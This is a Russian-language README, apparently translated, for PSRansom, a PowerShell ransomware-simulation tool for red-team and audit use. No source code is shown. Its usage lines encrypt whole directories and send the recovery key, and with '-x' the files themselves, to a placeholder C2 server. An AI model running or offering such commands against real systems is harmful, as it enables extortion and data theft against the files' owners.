 \___ \| |_) / _' | '_ \/ __|/ _ \| '_ ' _ \
| __/ ___) | _ < (_| | | | \__ \ (_) | | | | | |
|_| |____/|_| \_\__,_|_| |_|___/\___/|_| |_| |_|
----------------- by @JoelGMSec ----------------
Информация: Этот инструмент помогает симулировать процесс шифрования
типичного вымогателя в PowerShell с возможностями C2
Использование: .\PSRansom.ps1 -e Directory -s C2Server -p C2Port
Шифрует все файлы и отправляет ключ восстановления на C2Server
Используйте -x для эксфильтрации и дешифрования файлов на C2Server
.\PSRansom.ps1 -d Directory -k RecoveryKey
Расшифровывает все файлы с помощью строки ключа восстановления
Предупреждение: Вся информация будет отправлена на C2Server без какого-либо шифрования
Вам необходим заранее сгенерированный ключ восстановления для получения файлов
### Подробное руководство по использованию можно найти по следующей ссылке:
Этот проект лицензирован под лицензией GNU 3.0 — подробнее см. в файле LICENSE.
Этот инструмент создан и разработан с нуля Joel Gámez Molina // @JoelGMSec
Данное программное обеспечение не предоставляет никаких гарантий. Его использование разрешено исключительно в образовательных целях и/или для аудитов безопасности с соответствующим согласием клиента. Я не несу ответственности за его неправомерное использование или любой возможный ущерб, причинённый им.
Для получения дополнительной информации вы можете найти меня в Twitter как @JoelGMSec и в моём блоге darkbyte.net.
Вы можете поддержать мою работу, купив мне кофе:
